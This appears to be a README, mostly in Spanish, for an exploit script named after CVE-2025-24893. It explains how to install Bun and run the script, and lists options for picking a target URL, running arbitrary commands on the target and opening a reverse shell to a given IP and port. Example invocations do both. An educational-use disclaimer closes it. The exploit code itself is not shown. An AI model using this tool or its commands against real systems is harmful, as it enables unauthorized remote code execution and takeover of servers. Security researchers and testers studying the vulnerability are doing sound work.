
Instalar bun:
curl -fsSL https://bun.com/install | bash
Para instalar dependencias:
bun install
Para ejecutar:
bun run CVE-2025-24893.ts
Este proyecto fue creado usando bun init en bun v1.2.19. Bun es un runtime de JavaScript rápido y todo en uno.
Usage: bun CVE-2025-24893.ts [options]
Options:
-u, --url <url> The target URL to interact with.
-i, --ip <ip-address> The IP address for a reverse shell connection.
-p, --port <port-number> The port number for the reverse shell.
-r, --rverse Open a reverse shell connection.
-c, --cmd <command> Execute a specific command.
Examples:
# Execute a command on a target URL
bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"
# Open a reverse shell
bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444
Este exploit y guía son únicamente con fines educativos. Utiliza esta información de manera responsable y solo en sistemas para los que tengas permiso explícito de prueba. La explotación no autorizada de sistemas es ilegal y poco ética. Los autores y colaboradores no son responsables de ningún uso indebido o daño causado por esta información.